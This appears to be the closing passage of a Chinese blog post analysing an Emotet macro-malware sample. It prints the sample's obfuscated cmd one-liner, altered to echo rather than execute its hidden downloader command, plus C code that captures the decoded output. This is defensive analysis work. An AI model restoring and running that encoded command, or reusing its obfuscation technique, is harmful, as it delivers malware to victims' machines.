
秒杀宏病毒,解剖Emotet技术难点

来源:本站整理 作者:刀郎 时间:2018-08-21 TAG: 我要投稿
这里我们只要把 call 替换成 echo,再修改一下要打印的变量就可以了,我修改后的代码如下
Cmd /V:O/C"set -   =IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;mN9qC.@,\Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x&&for %o in (16,59,30,69,26,31,27,69,28,28,33,76,53,37,59,58,67,69,30,78,59,53,55,69,18,51,33,40,69,51,44,36,69,53,43,28,37,69,67,51,38,76,26,67,9,58,54,27,51,51,16,65,66,66,53,22,32,22,78,31,27,22,26,51,22,31,27,44,26,68,66,27,49,42,19,42,60,75,45,27,51,51,16,65,66,66,22,67,22,16,22,16,59,28,37,74,44,26,68,66,21,16,72,67,22,45,27,51,51,16,65,66,66,31,27,59,26,69,18,26,69,31,51,31,18,27,59,59,28,31,44,18,59,39,66,67,67,52,49,40,45,27,51,51,16,65,66,66,18,59,39,37,18,59,28,69,44,18,59,39,66,56,73,4,45,27,51,51,16,65,66,66,69,28,22,26,51,69,1,69,28,22,22,18,18,37,59,67,44,69,31,66,57,73,64,28,54,44,21,16,28,37,51,77,54,45,54,61,38,76,68,42,43,33,58,33,54,75,34,41,54,38,76,68,31,51,58,76,69,67,74,65,51,69,39,16,35,54,47,54,35,76,68,42,43,35,54,44,69,79,69,54,38,62,59,26,69,22,18,27,77,76,67,25,14,33,37,67,33,76,26,67,9,61,70,51,26,64,70,76,53,37,59,44,63,59,30,67,28,59,22,1,71,37,28,69,77,76,67,25,14,46,33,76,68,31,51,61,38,21,51,22,26,51,78,48,26,59,18,69,31,31,33,76,68,31,51,38,53,26,69,22,49,38,50,18,22,51,18,27,70,50,50,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,88)do set ]   =!]   !!-   :~%o,1!&&if %o==88 echo !]   !"
现在问题来了:虽然我们修改了代码,但怎么把显示结果打印出来呢?
我采用我最熟悉的方式——用C代码编程
代码如下
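/* Forward declaration: shell() is defined below main() in this listing, so
 * without this line the call below is an implicit function declaration
 * (invalid since C99, a hard error in C23). */
void shell(void);

/*
 * Entry point: hand off to shell(), which spawns cmd.exe with the
 * echo-modified command line and prints whatever cmd writes back.
 *
 * argc/argv are not used; they are kept so the signature stays the same.
 * Returns 0 (the original fell off the end of main without a return).
 */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;
    shell();
    return 0;
}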
   
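/* Forward declaration: initPipe() is defined further down in this file. */
void initPipe(void);

/*
 * Spawn cmd via initPipe() and copy everything it writes to the stdout
 * pipe (hReadPipeCmd, a file-scope HANDLE set by initPipe) onto our own
 * stdout.
 *
 * Fixes relative to the original:
 *  - the read length is sizeof(readBuff) instead of a hard-coded 4096 that
 *    may not match the buffer actually declared elsewhere in the file;
 *  - exactly BytesRead bytes are written with fwrite(); the original used
 *    printf("%s"), which needs a NUL terminator that a completely filled
 *    buffer does not have, so it could read past the end of readBuff;
 *  - ReadFile's result is checked and the loop ends on error or EOF
 *    (FALSE once every write handle on the pipe is closed) instead of
 *    spinning forever;
 *  - the unused locals dwByteWritten and TotalBytesAvail are dropped.
 *
 * Globals read: hReadPipeCmd, readBuff (both declared outside this
 * listing).  No return value; nothing is reported on read failure.
 */
void shell(void)
{
    initPipe();

    for (;;) {
        DWORD bytesRead = 0;
        /* Use the real buffer size rather than a hard-coded 4096. */
        if (!ReadFile(hReadPipeCmd, readBuff, sizeof(readBuff), &bytesRead, NULL) ||
            bytesRead == 0) {
            break;  /* error or EOF: the child has exited and the pipe is drained */
        }
        /* Write the bytes we actually got; do not rely on a terminator. */
        fwrite(readBuff, 1, bytesRead, stdout);
    }
    fflush(stdout);
}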
   
/*
 * Command line handed to CreateProcessW by initPipe().
 *
 * This is the author's *modified* copy of the sample's cmd one-liner: as
 * described in the text above, `call` was replaced by `echo`, so cmd only
 * prints the string it reconstructs from the index list instead of running
 * it.  Keep it that way; feeding the unmodified sample command to
 * CreateProcessW would execute it.
 *
 * Declared as a writable array (not a pointer to a literal) on purpose:
 * CreateProcessW may modify the command-line buffer it is given.
 * WCHAR is a typedef of wchar_t on Windows, so the two spellings agree.
 */
wchar_t tEst[] = L"Cmd /V:O/C\"set -   =IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;mN9qC.@,\\Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x&&for %o in (16,59,30,69,26,31,27,69,28,28,33,76,53,37,59,58,67,69,30,78,59,53,55,69,18,51,33,40,69,51,44,36,69,53,43,28,37,69,67,51,38,76,26,67,9,58,54,27,51,51,16,65,66,66,53,22,32,22,78,31,27,22,26,51,22,31,27,44,26,68,66,27,49,42,19,42,60,75,45,27,51,51,16,65,66,66,22,67,22,16,22,16,59,28,37,74,44,26,68,66,21,16,72,67,22,45,27,51,51,16,65,66,66,31,27,59,26,69,18,26,69,31,51,31,18,27,59,59,28,31,44,18,59,39,66,67,67,52,49,40,45,27,51,51,16,65,66,66,18,59,39,37,18,59,28,69,44,18,59,39,66,56,73,4,45,27,51,51,16,65,66,66,69,28,22,26,51,69,1,69,28,22,22,18,18,37,59,67,44,69,31,66,57,73,64,28,54,44,21,16,28,37,51,77,54,45,54,61,38,76,68,42,43,33,58,33,54,75,34,41,54,38,76,68,31,51,58,76,69,67,74,65,51,69,39,16,35,54,47,54,35,76,68,42,43,35,54,44,69,79,69,54,38,62,59,26,69,22,18,27,77,76,67,25,14,33,37,67,33,76,26,67,9,61,70,51,26,64,70,76,53,37,59,44,63,59,30,67,28,59,22,1,71,37,28,69,77,76,67,25,14,46,33,76,68,31,51,61,38,21,51,22,26,51,78,48,26,59,18,69,31,31,33,76,68,31,51,38,53,26,69,22,49,38,50,18,22,51,18,27,70,50,50,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,88)do    set ]   =!]   !!-   :~%o,1!&&if %o==88 echo !]   !\"    ";
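/*
 * Spawn cmd with the command line in tEst and route its stdout/stderr into
 * the hReadPipeCmd/hWritePipeCmd pipe so shell() can read the output.
 *
 * Fixes relative to the original:
 *  - si.dwFlags lacked STARTF_USESTDHANDLES and CreateProcessW was called
 *    with bInheritHandles = FALSE, so hStdInput/hStdOutput/hStdError were
 *    ignored and the child wrote straight to the inherited console; the
 *    pipe was never actually used.
 *  - the parent's copies of the child-side pipe ends (hWritePipeCmd,
 *    hReadPipeShell) are closed after a successful spawn too, not only on
 *    the error path, so a reader sees EOF once cmd exits; the parent-side
 *    ends are marked non-inheritable so cmd does not hold extra copies.
 *  - CreatePipe results are checked; pi.hThread is closed; GetLastError()
 *    (a DWORD) is printed with %lu instead of %d.
 *
 * Globals written: hReadPipeCmd, hWritePipeCmd, hReadPipeShell,
 * hWritePipeShell, hProcessHandle (all declared outside this listing).
 * On failure the error is printed and the function returns without
 * setting hProcessHandle.
 *
 * NOTE(review): the WaitForSingleObject below runs before anyone reads the
 * pipe.  If cmd writes more than the pipe buffer holds before it exits, it
 * blocks on the write and this wait never returns.  That is fine for the
 * short `echo` output this listing is written for; drain the pipe
 * concurrently for larger outputs.
 */
void initPipe(void)
{
    SECURITY_ATTRIBUTES sa = { 0 };
    STARTUPINFOW si = { 0 };
    PROCESS_INFORMATION pi = { 0 };

    sa.nLength = sizeof(sa);
    sa.lpSecurityDescriptor = NULL;
    sa.bInheritHandle = TRUE;  /* both ends inheritable; parent ends fixed up below */

    /* Pipe 1: child's stdout/stderr -> parent. */
    if (!CreatePipe(&hReadPipeCmd, &hWritePipeCmd, &sa, 0)) {
        printf("CreatePipe Error:%lu!\n", GetLastError());
        return;
    }
    /* Pipe 2: parent -> child's stdin. */
    if (!CreatePipe(&hReadPipeShell, &hWritePipeShell, &sa, 0)) {
        printf("CreatePipe Error:%lu!\n", GetLastError());
        CloseHandle(hReadPipeCmd);
        CloseHandle(hWritePipeCmd);
        hReadPipeCmd = hWritePipeCmd = NULL;
        return;
    }
    /* Only the child-side ends should cross into cmd. */
    SetHandleInformation(hReadPipeCmd, HANDLE_FLAG_INHERIT, 0);
    SetHandleInformation(hWritePipeShell, HANDLE_FLAG_INHERIT, 0);

    GetStartupInfoW(&si);
    si.cb = sizeof(si);
    si.wShowWindow = SW_SHOW;
    /* STARTF_USESTDHANDLES is what makes the three std handles below count. */
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.hStdInput = hReadPipeShell;
    si.hStdOutput = si.hStdError = hWritePipeCmd;

    /* bInheritHandles must be TRUE or the std handles are not passed on.
     * tEst is a writable array, which CreateProcessW requires. */
    if (!CreateProcessW(NULL, tEst, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {
        printf("CreateProcess Error:%lu!\n", GetLastError());
        CloseHandle(hWritePipeCmd);
        CloseHandle(hReadPipeShell);
        hWritePipeCmd = hReadPipeShell = NULL;
        return;
    }
    /* cmd now holds its own copies; dropping ours lets the reader see EOF. */
    CloseHandle(hWritePipeCmd);
    CloseHandle(hReadPipeShell);
    hWritePipeCmd = hReadPipeShell = NULL;
    CloseHandle(pi.hThread);

    hProcessHandle = pi.hProcess;
    WaitForSingleObject(hProcessHandle, INFINITE);
    printf("exit");
    getchar();
}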
下面放一个我跑出的图吧:

以后妈妈再也不用担心我的学习了,秒杀一切。
第五章 总结
好了,类似于这种宏病毒的样本,技术点就分析完成了,剩下的就是拿 OD 跟 PE 文件了,我这里就不介绍了。最后说点题外话:我不是不会技术分析,只是我觉得思路比技术分析亮点大,技术分析是个人都会,只是时间问题,唯独思路才强大。
 

